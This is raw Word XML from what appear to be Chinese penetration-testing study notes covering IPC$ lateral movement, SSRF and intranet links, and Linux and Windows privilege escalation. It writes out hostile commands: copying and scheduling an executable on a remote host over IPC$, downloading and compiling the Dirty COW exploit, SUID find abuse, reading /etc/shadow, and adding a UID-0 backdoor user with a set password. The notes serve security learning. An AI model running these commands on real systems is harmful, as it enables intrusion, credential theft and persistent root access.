        <w:t xml:space="preserve"> ver:5.7.48 比如某天某个版本的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003853C3">
        <w:t>cms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003853C3">
        <w:t>出现了漏洞，你需要去刷一波</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512F3A7" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994"/>
    <w:p w14:paraId="331A0D22" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w14:paraId="0976A56D" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w14:paraId="27B4F26F" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w14:paraId="63C549C3" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABBBF2" w14:textId="77777777" w:rsidR="001C373D" w:rsidRPr="001C373D" w:rsidRDefault="001C373D" w:rsidP="001C373D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156014A" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t xml:space="preserve">net use \\ip\ipc$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C4D92" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="7AB8C422" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="1D495459" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>copy d:\system.exe \\ip\c$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135A7E3" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="227662DE" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>net time \\ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBA95A" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="645CBF34" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t xml:space="preserve">at \\ip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shij</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:\system.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520221A" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>at \\ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC93515" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="5E064736" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>net share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6C1A1" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="7C9EFD40" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>services.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A667031" w14:textId="77777777" w:rsidR="00AD3AAE" w:rsidRDefault="00AD3AAE" w:rsidP="00F91404"/>
    <w:p w14:paraId="46EAF007" w14:textId="77777777" w:rsidR="00AD3AAE" w:rsidRDefault="00AD3AAE" w:rsidP="00AD3AAE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>SRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07097F" w14:textId="77777777" w:rsidR="00AD3AAE" w:rsidRDefault="00C51675" w:rsidP="00F91404">
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidR="0039199F" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.dyboy.cn/websecurity/160.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F041585" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="4ABA54A0" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="694D58A3" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="574E4F3D" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="7242B1D2" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ACBD41" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00C51675" w:rsidP="0039199F">
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidR="0039199F" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.bilibili.com/video/av88459896?from=search&amp;seid=12563701269010581597</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14E512C0" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00C51675" w:rsidP="0039199F">
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidR="0039199F">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.bilibili.com/video/av33026520/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="330D02B4" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F"/>
    <w:p w14:paraId="152D7AA6" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提权总结</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7022F" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0094298A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4C0768" wp14:editId="07C4EC50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000625" cy="22860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B6A50" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="501A6377" w14:textId="77777777" w:rsidR="0039199F" w:rsidRP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Linux</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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提权的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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前提：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F66B55B" w14:textId="77777777"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拿到了一个低权限的账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424837D4" w14:textId="77777777"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能上传和下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67929CB3" w14:textId="77777777" w:rsid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机器上有python、java环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E927350" w14:textId="77777777" w:rsidR="00162B31" w:rsidRPr="00162B31" w:rsidRDefault="00162B31" w:rsidP="00162B31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5EC0AB" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00162B31" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F1A15">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脏牛提</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F1A15">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75123CA8" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>漏洞范围</w:t>
      </w:r>
      <w:r>
        <w:t>：Linux内核 &gt;= 2.6.22（2007年发行，到2016年10月18日才修复）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ADDF62" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>Exp下载</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/FireFart/dirtycow" </w:instrText>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>https://github.com/FireFart/dirtycow</w:t>
      </w:r>
      <w:r w:rsidR="00BF52E4">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F913C" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:history="1">
        <w:r w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.0.99/dirty.c -O /tmp/dirty.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21539473" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirty.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o exp -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（编译命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72B79A" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>exp feng （使用exp，后面的feng是密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA4EC9" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>root已经替换成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AAD4591" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F"/>
    <w:p w14:paraId="1452AFA2" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>su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提权</w:t>
      </w:r>
      <w:r w:rsidR="00851549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328992B" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="0039199F">
      <w:r w:rsidRPr="0094298A">
        <w:t>https://www.freebuf.com/articles/system/149118.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788CCC2" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199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623E28E" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B71E47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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11116895" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+所要运行的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5C6FC" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FADDB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51549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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'/bin/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' \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D6B25" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39545A50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先touch XXX创建一个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74197544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然后：find / -type f -name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w: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"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whoami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" \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB4B97A" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F"/>
    <w:p w14:paraId="233C35E5" w14:textId="77777777" w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd         #查看用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC4AFC" w14:textId="77777777" w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow         #查看用户的密码信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05999D" w14:textId="77777777" w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/group          #查看用户的组信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E2DD60" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9"/>
    <w:p w14:paraId="7E536E55" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRPr="00B54C43" w:rsidRDefault="00B54C43" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54C43">
        <w:t>利用 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B54C43">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54C43">
        <w:t>/passwd 文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCB780" w14:textId="77777777" w:rsidR="00B54C43" w:rsidRDefault="00C51675" w:rsidP="000121D9">
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidR="00B54C43" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/qq_36119192/article/details/99871667</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FD896D3" w14:textId="77777777" w:rsidR="00B54C43" w:rsidRPr="00B54C43" w:rsidRDefault="00B54C43" w:rsidP="000121D9"/>
    <w:p w14:paraId="531ED0A7" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9">
      <w:r>
        <w:t>以下这条命令直接生成一个具有root权限的用户：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>venus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，密码为：123qwe 。前提是这条命令的执行需要root权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603772C1" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t xml:space="preserve"> -p `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t xml:space="preserve"> passwd -1 -salt 'user' 123qwe` -u 0 -o -g </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>root  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t xml:space="preserve">G root -s /bin/bash -d /home/user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191C2D">
        <w:t>venus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A3A3905" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w14:paraId="36AA45AA" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w14:paraId="3D3F6439" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows提权：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4B3E7" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看主机版本基本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA66C8D" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w14:paraId="149F2994" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w14:paraId="390AC9C4" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w14:paraId="6DEB241D" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w14:paraId="70D56A69" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w14:paraId="46604457" w14:textId="77777777" w:rsidR="00BF52E4" w:rsidRDefault="00BF52E4" w:rsidP="000121D9"/>
    <w:p w14:paraId="762AA3BB" w14:textId="77777777" w:rsidR="00BF52E4" w:rsidRPr="00851549" w:rsidRDefault="00BF52E4" w:rsidP="000121D9">
      <w:r w:rsidRPr="00BF52E4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28AA7023" wp14:editId="2D9CB599">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-245110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2343785" cy="302958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2E4" w:rsidRPr="008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2AA2" w14:textId="77777777" w:rsidR="00B81EF1" w:rsidRDefault="00B81EF1" w:rsidP="0038154F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51E1BC01" w14:textId="77777777" w:rsidR="00B81EF1" w:rsidRDefault="00B81EF1" w:rsidP="003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AEA9" w14:textId="77777777" w:rsidR="00B81EF1" w:rsidRDefault="00B81EF1" w:rsidP="0038154F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="79AB873E" w14:textId="77777777" w:rsidR="00B81EF1" w:rsidRDefault="00B81EF1" w:rsidP="0038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E8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F9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6EAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE0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4E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="628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E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="392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26638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F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5B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BC0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67BF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A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371B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="458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55449"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80E6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6226"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C2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63D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1049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345AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE1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0240"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1E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320B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="820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A3D76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="533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32089"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA1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D48BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD8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E760D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="536A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C360D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A5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A2932"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F3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2627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="658C3F92"/>
    <w:lvl w:ilvl="0" w:tplc="526C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3637C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8D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74EFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCF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F0B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED8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A9401B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC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83F50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28F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45BD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB8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53BC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D07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82EF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84DA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228AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E2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000B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="435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15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2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24"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="25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3A"/>
    <w:rsid w:val="000121D9"/>
    <w:rsid w:val="00034129"/>
    <w:rsid w:val="00044372"/>
    <w:rsid w:val="000523A1"/>
    <w:rsid w:val="00056C4E"/>
    <w:rsid w:val="000764FB"/>
    <w:rsid w:val="000824C0"/>
    <w:rsid w:val="00091445"/>
